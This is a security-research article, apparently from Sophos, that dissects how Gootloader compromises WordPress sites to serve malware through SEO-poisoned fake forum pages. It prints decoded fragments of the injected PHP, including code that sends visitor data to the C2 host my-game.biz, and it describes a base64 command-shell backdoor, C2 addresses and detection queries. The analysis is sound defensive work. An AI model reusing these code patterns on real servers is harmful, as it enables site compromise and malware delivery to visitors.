-9.1 C
New York

Gootloader inside out – Sophos News

Published:

Source of the Gootloader landing pages reveal a number of different search terms and phrases the threat actors wanted search engines to index. The linked subpages (selected with green) don’t actually exist. The injected WordPress code defines a few hooks, one of them is for non-existing pages. This will serve the fake forum discussion, when the victim clicks on the search result

That hidden element had links (selected with green) and the matching targeted search terms (selected with brown):

This hidden element will not be visible to human webpage visitors. But search engine crawlers see and process it, which tricks the search engines into treating the website as if it provides relevant content on the poisoned search term, thus ranking the site high in the search results.

Compromised landing page code

When security vendor Sucuri wrote up a blog post about an earlier generation of Gootloader, it included this screenshot:

 A screenshot of the source code from a Gootkit/Goodloader landing page. Image courtesy of Sucuri Research.
A screenshot of the source code from a Gootkit/Goodloader landing page. Image courtesy of Sucuri Research.

The report (and screenshot) revealed three promising strings:

  • The request: $_GET[”a55d837’
  • A malicious web domain name: ‘my-game[.]biz’
  • A SQL query (shown on a different screenshot in Sucuri’s blog): ‘SELECT * FROM backupdb_’

Searching Google for code fragment $_GET[”a55d837’ led us to an online decoder page, where the result (now deleted) of another researcher’s query revealed the encoded version of the PHP code used in the malicious web page:

function qwc1() {
    global $wpdb, $table_prefix, $qwc1;
    $qwc2 = explode('.', $_SERVER["\x52\105\x4d\117\x54\105\x5f\101\x44\104\x52"]);
    if (sizeof($qwc2) == 4) {
        if ($wpdb - > get_var("\x53\105\x4c\105\x43\124\x20\105\x58\111\x53\124\x53\40\x28\123\x45\114\x45\103\x54\40\x2a\40\x46\122\x4f\115\x20\142\x61\143\x6b\165\x70\144\x62\137".$table_prefix.
                "\x6c\163\x74\141\x74\40\x57\110\x45\122\x45\40\x77\160\x20\75\x20\47".$qwc2[0].
                '|'.$qwc2[1].
                '|'.$qwc2[2].
                "\x27\51\x3b") == 1) {

and the decoded version of that same script:

function qwc1() {
    global $wpdb, $table_prefix, $qwc1;
    $qwc2 = explode('.', $_SERVER["REMOTE_ADDR"]);
    if (sizeof($qwc2) == 4) {
        if ($wpdb - > get_var("SELECT EXISTS (SELECT * FROM backupdb_".$table_prefix.
                "lstat WHERE wp = '".$qwc2[0].
                '|'.$qwc2[1].
                '|'.$qwc2[2].
                "');") == 1) {

While it isn’t clear how the code ended up on that website, the Internet never forgets: Search engines found and indexed this analysis. This gave us the first insight at what the injected code of the compromised landing pages would look like.

(Both the analysis linked above, and another page I subsequently found on malwaredecoder.com, were later removed by their respective site owners. Search results that reveal ephemeral analysis pages like these are only available for a short period of time. If you plan to cite source materials from sites such as these, keep an offline copy of the page, because they may not be there when you return.)

At this point we didn’t know exactly how the sites are compromised, but we knew from the report that malicious PHP code is somehow inserted into the WordPress installation.

The search on VirusTotal for content:”SELECT * FROM backupdb_” gives a couple of files from a compromised server that contain an error message:

WordPress database error: [Table 'interfree.backupdb_wp_lstat' doesn't exist]
SELECT EXISTS (SELECT * FROM backupdb_wp_lstat WHERE wp = '117|50|2');

The criminals are likely using the database backupdb_wp_lstat, which must have been removed from the server during a cleanup. We were hunting for this content on VirusTotal (search term: content:”backupdb_wp_lstat”), hoping we would stumble upon a database dump. It is always a good idea to set up these rules and do additional retrohunts, which can reveal other valuable files or data.

We were lucky, and found an archive file containing a SQL dump of the WordPress database from a compromised server on a public malware repository.

The WordPress database dump included this table that contains a set of the first three octets of IP addresses, a block list of IP ranges that cannot revisit the Gootloader website on the same day
The WordPress database dump included this table that contains a set of the first three octets of IP addresses, a block list of IP ranges that cannot revisit the Gootloader website on the same day

The dumped database contains a table called backupdb_wp_lstat. Later analysis determined that this table contains the IP address blocklist the malicious website uses to prevent repeat visits.

The obfuscated PHP code was also viewable in the database dump:

A block of base64-encoded data stored as a variable named $pposte in a WordPress database
A block of base64-encoded data stored as a variable named $pposte in a WordPress database

…as was the injected SEO poisoning content, with the j$k..j$k marker:

Malicious SEO content phrases embedded in a WordPress database table, linking the site to an Excel spreadsheet converter search query
Malicious SEO content phrases embedded in a WordPress database table, linking the site to an Excel spreadsheet converter search query

Researchers who want to hunt for this identifiable string in the Descriptions property of the malicious landing pages can use the regex  /j\$k([0-9]{1,10})j\$k/

The "place marker" string appears in the OpenGraph metadata SEO headers of a Gootkit/Gootloader-modified web page
The “place marker” string appears in the OpenGraph metadata SEO headers of a Gootloader-modified web page

This marker serves as placeholder for the spot where Gootloader’s link to the page renderer script is inserted. When the Gootloader page is served up, it excludes the marker from the page source.

However, the code extracted from the SQL database dump was not exactly the same as what was shown in the Sucuri blog. We continued searching for more examples by pivoting on the C2 server my-game[.]biz, and found a handful of PHP files referring to that server:

Files that contain references to the Gootloader "mothership" website (screenshot courtesy of VirusTotal)
Files that contain references to the Gootloader “mothership” website (screenshot courtesy of VirusTotal)

The submission name commented_functions.php looked promising. Indeed, it turned out to be likely the work of a researcher, analyzing the PHP source code from the compromised WordPress installation. It was kindly documented in detail, saving us some analysis time (which also helped because we didn’t have all the components).

Commented text, preceded with double slashes, documents the Gootkit characteristics of modified web pages
Commented text, preceded with double slashes, documents the Gootkit characteristics of modified web pages

We were able to use the base64 string referenced in the “html” comment above to search VirusTotal, which led us to a (relatively) recently uploaded SQL dump.

a WordPress database dump in VirusTotal
a WordPress database dump in VirusTotal

The dump file contained the previously referenced base64 blob…

 A SQL dump from a compromised WordPress installation contains base64-encoded elements of the Gootkit/Gootloader modifications
A SQL dump from a compromised WordPress installation contains base64-encoded elements of the Gootkit/Gootloader modifications

…which, when decoded, output the same code that was originally published by Sucuri:

The decoded base64 data from the WordPress database reveals the PHP script that handles decoding the malicious content for a site visitor
The decoded base64 data from the WordPress database reveals the PHP script that handles decoding the malicious content for a site visitor

With this in hand, we had greater confidence in the provenance of this malicious code. We also identified  the table where Gootloader stores it in a compromised WordPress database. Having located the dump of the WordPress database and the PHP code on the online decoder site, we have a complete copy of the malicious content hosted on the compromised landing sites.

What’s in the landing page code?

This code contains a simple PHP command shell, which the Gootloader attackers can use to maintain access to compromised pages.

The variable $pposte holds the name of the parameter that gets executed. If the compromised website receives an HTTPS POST with that string in it, the code on the page will decode and execute any base64 encoded commands it receives, turning into a bare-bones command shell the attackers can use to maintain control over the server:

A simple command shell Gootkit inserts into the PHP running in a WordPress site the threat actors have comrpomised
A simple command shell Gootloader inserts into the PHP running in a WordPress site the threat actors have compromised

At other points inside the code, the script defines filters for WordPress events, which trigger the execution of functions based on predefined conditions.

For example, the following function executes once the attackers have set up the compromised WordPress environment: the invoked code (referenced as “qvc5”) initializes the backupdb_wp_lstat database table.

    add_action("wp", "qvc5");

This snippet from the qvc5() function initializes the backend databases used by Gootloader:

if ($table_prefix < > "backupdb_".$qvc4) {
    $table_prefix = "backupdb_".$qvc4;
    wp_cache_flush();
    $qvc5 = new wpdb(DB_USER, DB_PASSWORD, DB_NAME, DB_HOST);
    $qvc5 - > set_prefix($table_prefix);

On preparing the requested web page, the malicious event handler hooks build the request to the “mothership” (a name I’ve given to the website the Gootloader operators use to centrally manage their fleet of compromised blogs). The communication sends the mothership the following parameters of the initial request, all in base64 encoded form:

  • a: Unique server ID
  • b: IP address of the unsuspecting visitor
  • c: user agent
  • d: referrer string
if (isset($_GET[$qwc4])) {
   $request = @wp_remote_retrieve_body(@wp_remote_get("http://my-game.biz/index.php?a=".base64_encode($_GET[$qwc4]).
   '&b='.base64_encode($_SERVER["REMOTE_ADDR"]).
    '&c=".base64_encode($_SERVER["HTTP_USER_AGENT"]).
    "&d='.base64_encode(wp_get_referer()), array("timeout" => 120)))

One of Gootloader’s most problematic behaviors is that it only allows the potential victim to visit the site once in a 24-hour period. It does this by adding the originating IP address of this communication (the address of the victim PC, variable ‘b’ above) to a block list. The server also geofences IP address ranges, and only allows requests to originate from specific countries of interest to the Gootloader threat actor.  The referrer string (variable ‘d’ above) contains the original search terms.

This results in a query that looks like this:

http://my-game.biz/index.php?a=YWFkZTVlZQ&b=ODUuMjE0LjEzMi4xMTc&c=TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzg4LjAuNDMyNC4xNTAgU2FmYXJpLzUzNy4zNg&d=Z29vZ2xlLz9xPWNpc2NvX3dwYV9hZ3JlZW1lbnQ

(In this example, the “&d=” referrer string is the base64-encoded value of “google/?q=cisco_wpa_agreement”)

Later, we will see that the server’s response will be the fake forum page renderer code.

The mothership sends the fake forum page

The mothership response contains two parts: one contains the HTML header elements, and the other contains the page body content. The two are delimited in the code by a tag.

The header part contains multiple elements, separated by pipe (“|”) characters. Using what it gets from the mothership, the landing page code will gather the HTML content:

The portion of the Gootkit code that collects the HTML content of the fake page it will later draw over the top of the compromised website
The portion of the Gootkit code that collects the HTML content of the fake page it will later draw over the top of the compromised website

The script adds the entire /24 IP address range where the request originated to a 24-hour block list. Neither the originating computer, nor any others with the same initial three sets of numbers in its IP address, can get the page again for at least a day. (This was already seen in the SQL database dump):

 The Gootkit code blocks repeat visitors by adding not only the visitor's IP address range to a block list, but the entire class C IPv4 address range on either side of the visitor's address, just for good measure
The Gootkit code blocks repeat visitors by adding not only the visitor’s IP address range to a block list, but the entire class C IPv4 address range on either side of the visitor’s address, just for good measure

How Gootloader renders the fake forum page

If the request comes from an IP address that isn’t on the block list, the malicious code in the compromised WordPress database takes action and delivers the bogus message board content (typically titled simply “Questions And Answers”) to the visitor’s browser.

The Gootkit/Gootloader fake forum page, featuring a "question" and an "answer" that links to the Gootloader JScript first-stage payload
The Gootloader fake forum page, featuring a “question” and an “answer” that links to the Gootloader JScript first-stage payload

The only visible malicious content in the source code of a compromised landing page is a simple inserted JavaScript tag. For example:

https://powerstick.com/main/?ad94610=1174868

Here, again, the unique key for the infected server is used as a parameter assigned to a numeric value (1174868 in the above example):

The unique key is linked in a Javascript code snippet embedded in the compromised WordPress server page.
The unique key is linked in a Javascript code snippet embedded in the compromised WordPress server page.

This

If the HTTPS GET request contains a query string that includes the infection ID, the handler code sends a request to the mothership and renders the response.

We are able to get the code returned by the mothership by grabbing the fake landing page HTML source, and using a web debugger that records the on-the-fly changes.

First it deletes the original content of the HMTL page:

A set of commands that deletes from view the original page content on the compromised WordPress server page the visitor lands on
A set of commands that deletes from view the original page content on the compromised WordPress server page the visitor lands on

…and replaces it with the fake forum text…

The replacement content includes the text of the "Questions And Answers" fake forum page
The replacement content includes the text of the “Questions And Answers” fake forum page

…which also contains the download link for the first stage JScript payload:

The download link points to a php script hosted on a different server. This link delivers the .js file packed into a Zip archive which comprises the first stage Gootloader payload
The download link points to a php script hosted on a different server. This link delivers the .js file packed into a Zip archive which comprises the first stage Gootloader payload

The result will look like a conversation in the blog comments in which someone “asks” a question identical to the search query passed from the Google referrer text, a “response” appears from a user account named Admin with the search term hotlinked to the first stage JScript downloader, and a followup “response” from the same “user” who “asked” the initial question, thanking the admin who “answered.”

The entire conversation is a fiction. It follows this pattern in every Gootloader incident.

A Gootkit/Gootloader fake forum page in German. The source code of the page shows the link points to a file named down.php hosted on a completely different server than the one where the page appears. The link marked in red will connect to the server that is hosting the first-stage download JScript.
A Gootloader fake forum page in German. The source code of the page shows the link points to a file named down.php hosted on a completely different server than the one where the page appears. The link marked in red will connect to the server that is hosting the first-stage download JScript.

The first-stage downloader site

The fake forum page connects to the first stage download server, where a PHP script serves the first stage JScript downloader script.

(We received a copy of this script from another researcher in the security community, who wishes to remain anonymous, under TLP:Red restrictions. While we couldn’t use the script we received in this blog post, we could use characteristics of the script to hunt for similar samples.)

On the server side, this file is embedded as a large Base64-encoded data blob, with text that begins:


With this information, we could search for similar scripts, using this Yara rule:

rule gootkit_stage1_dl{
   strings:
          $a = "

This gave us a handful of other variants of the script, with the main difference being the download URL:

We observed two mothership addresses, 5.8.18[.]7 and my-game[.]biz in the samples we studied. At the time we initially researched this, the my-game domain resolved to that IP address (it now resolves elsewhere). Oddly, the compromised landing page code links to the domain, and the first stage JScript downloader links to the IP address.

The first stage download script (down.php or join.php or about.php or index.php) simply relays the incoming request to the mothership:

The source code of the PHP script that delivers the first stage Gootloader payload
The source code of the PHP script that delivers the first stage Gootloader payload

The request sent to the mothership will return the first-stage downloader JScript packaged in a Zip archive. Because it passes the original referrer string all the way to the mothership, it will receive the original search terms, and can return a payload with a file name matching these search terms, which is what we’ve observed happens.

How Gootloader compromises WordPress servers

Near the end of our initial research, we found an important piece of information about the likely source of the initial compromise of the hosting WordPress servers. As we gather more information, it’s worth revisiting prior research, which may reveal clues that we didn’t know were related at the time.

The writeup describes an attack where attackers placed a modified copy of the Hello Dolly plugin in the WordPress uploads directory (e.g. wp-content/uploads/), which they then used to initiate the installation of the malicious WordPress content.

HelloDolly.php has been a stock plugin, included with the WordPress self-hosted download, for many years. In any case, modifying this code in a relatively benign plugin, and leaving it in place on the compromised server, allows Gootloader to operate in plain sight while minimizing the filesystem changes that might reveal a compromise to an alert webmaster.

There are several ways in which a threat actor might be able to place a file into a WordPress site: The credentials for the web server might have been phished or stolen; a WordPress component may have had a vulnerability that permitted remote users to perform SQL injection or command execution exploits on the host server; the administrative WordPress password might have been stolen.

In this case, the writeup contains a screenshot:

Screenshot of the modified HelloDolly.php script (courtesy of the Rich Infante blog)
Screenshot of the modified HelloDolly.php script (courtesy of the Rich Infante blog)

We searched VirusTotal for more of these files:

content:"dolly_css"

While we found several clean, original versions of the HelloDolly.php file…

  • 2c5717200729f76b857a8a32608b72fd3c15772dfcc607bebfc3b36f8ab2a499
  • 2c3d2a55349efe8b636350b58181d930a73e0d0ede59dcaadc47d9a56dd15127

…we found many more where the backdoor code had been injected…

  • 03a46ad7873ddb6663377282640d45e38697e0fdc1512692bcaee3cbba1aa016
  • 1fcc418bdd7d2d40e7f70b9d636735ab760e1044bb76f8c2232bd189e2fd8be7
  • 258cb1d60a000e8e0bb6dc751b3dc14152628d9dd96454a3137d124a132a4e69
  • 5d50a7cf15561f35ed54a2e442c3dfdac1d660dc18375f7e4105f50eec443f27
  • 7bcffa722687055359c600e7a9abf5d57c9758dccf65b288ba2e6f174b43ac57
  • af50c735173326b2af2e2d2b4717590e813c67a65ba664104880dc5d6a58a029

…and we also found a few Zips that contained complete copies of compromised WordPress installations:

  • 89672c08916dd38d9d4b7f5bbf7f39f919adcaebc7f8bb1ed053cb701005499a

Here, the malicious HelloDolly PHP script is installed as a WordPress plugin under the path:

wp-content\plugins\Hello_Dolly\HelloDolly.php
Another format of the modified HelloDolly.php script shows the unique identifier string
Another format of the modified HelloDolly.php script shows the unique identifier string

The malicious PHP files show the additional code, along with the original Hello Dolly lyrics. An inserted code will check the POST request for specific parameters, and if found, will execute the submitted installation code.

A variation on the modified HelloDolly.php script
A variation on the Gootloader-modified HelloDolly.php script

We found other variations where the $dolly variables are renamed $wp

The research blog post summarizes the process like this:

A screenshot that summarizes the modification process Gootloader uses (image courtesy of the Rich Infante blog)
A screenshot that summarizes the modification process Gootloader uses (image courtesy of the Rich Infante blog)

We found these components in the SQL database dumps, giving us enough confidence to establish that this was (at least) one way the attackers compromised these legitimate WordPress sites to turn them into distribution servers.

A WordPress database dump contains the same elements that the Rich Infante blog references
A WordPress database dump contains the same elements that the Rich Infante blog references

Docking with the mothership

The mothership server plays a central role orchestrating the early stages of the infection process: It provides the fake forum content that the compromised sites display in the target’s browser, as well as the first stage payload.

Unfortunately, because this has all been maintained on a server that is directly controlled by the threat actors, whatever source code it may contain is not available to researchers.

Disturbingly, since 2018 when Gootloader first appeared on the scene, it has used the same domain, and for most of that time, the domain pointed to most of the same IP addresses.

5.8.18[.]7

The my-game[.]biz domain resolved to this IP address for several years. Many of the malicious scripts point directly at URLs hosted on this IP address to deliver components of the infection.

Known URLs:

http://5.8.18[.]7/filezzz.php

The initial components of the infection are files known as Gootkit. They are usually just PHP scripts that contain a base64-encoded string and a script to decode the data and output it to a variable, such as this file (variably referred to as join.php or down.php).

The encoded form of a PHP script that delivers the .js payload
The encoded form of a PHP script that delivers the .js payload

We were also able to identify several Gootkit files that refer to, or link to, this IP address, including this script, and this script. Both of these files contain error messages that refer to something not being able to completely download a component.

A screenshot of a file uploaded to VirusTotal shows references to the IP address formerly used to host the Gootkit/Gootloader "mothership" server
A screenshot of a file uploaded to VirusTotal shows references to the IP address formerly used to host the Gootkit/Gootloader “mothership” server

Interestingly, the server-side downloader script was named file_tmp_41.php, which is unlike the downloader scripts seen normally. That may indicate this script was an artifact of testing.

If we pivot off of this information, and (for example) search VirusTotal for content:” . The result yields additional files, both of which contain a URL that we’ve previously discussed:

http[:]//5.8.18.7/filesst.php?a=$i&b=$u&c=$r&d=$h&e=$g

5.8.18[.]159

This was another address that my-game[.]biz has resolved to in the past. We were able to find another first-stage Gootkit component that links directly to this IP address.

91.215.85[.]52

Yet another IP that has been used to host my-game[.]biz and continues to do so. We found still another first-stage Gootkit script that links to this IP address.

my-game[.]biz

The site is blank now, but the Internet Archive reveals an interesting origin story to this domain: In 2014, it was used to host a Russian online gambling site. Since 2018, the page has hosted no other content but has been linked to the Gootkit/Gootloader malware.

The my-game website as it appeared in 2014, a Russian-language gambling site called "Casino Game Life"
The my-game website as it appeared in 2014, a Russian-language gambling site called “Casino Game Life”

The only other reference we could find to the domain was a Counter-Strike clan directory dating back more than 15 years.

The my-game domain that continues to host the Gootkit/Gootloader mothership originally belonged to a German team that played the game Counter-Strike competitively
The my-game domain that continues to host the Gootkit/Gootloader mothership originally belonged to a German team that played the game Counter-Strike competitively

The directory lists this website as the home page for a group of “semi professional” players based in Germany who played under the handle #mY-GaMe.

Name:     #mY-GaMe
Clan-Tag (Kürzel):     #mY-GaMe`
Land (Hauptsitz des Clans):   Deutschlandweit
Ort (Hauptsitz des Clans):    Deutschlandweit
Leader:   pr0nb1tch
ICQ#:     256558686
Homepage: http://www.my-game.biz
Anzahl der Spieler:    10
Art der Spielmodi:     Leaguez
Clan-Profil:    Semi-Profi-Clan
Clan sucht neue Spieler:      Ja
Leader: kevin.goe@online.de


Open-source intelligence reveals a lot

With a malware infection method seemingly designed to make it as difficult as possible for researchers to dig in and learn how it works, Gootloader remains one of the most pernicious and difficult-to-study threats on the web.

However, despite most of its code existing and running inside of other people’s WordPress servers, the proliferation of online analysis tools provides a rich pool of opportunity to learn how the malware works, and how its loader delivers payloads. Thanks to the resources uploaded by a variety of different analysts and researchers, we’ve been able to build a nearly complete picture of how the malware operates.

The PHP scripts, embedded JavaScript components, and downloadable JScript payloads of this infection are now well understood, and yet the malware continues to have an impact, more than six years after it was first discovered. Fortunately, due to the relatively sluggish pace of the malware’s development and its relatively stable hosting of the “mothership” server, static and dynamic detections remain effective.

And a final note about collaborative research projects. It pays to develop and maintain relationships with the malware analysis and security research community. For this project, we received help from several researchers, some of whom did not want to be acknowledged. Our advice: If you do this kind of work, don’t hesitate to share your findings; you will find that the effort you invest in collaboration with colleagues across the industry will eventually pay off when you need information. We are grateful for the support and help we received from several individuals.

Acknowledgments

Sophos X-Ops gratefully acknowledges the contribution of Marv Ahlstrom, an SEO expert who advised us about various aspects of Gootloader/Gootkit’s malicious SEO. The author also wishes to thank the pseudonymous researchers who use the handles @sS55752750, @SquiblydooBlog, and @GootLoaderSites for their assistance. We also recognize and are grateful for research previously published by Sucuri and Rich Infante. X-Ops researcher Andrew Brandt contributed to this analysis.

Indicators of compromise

Hashes and other IOCs referenced in this story are listed on the SophosLabs Github.

 



Source link

Related articles

Recent articles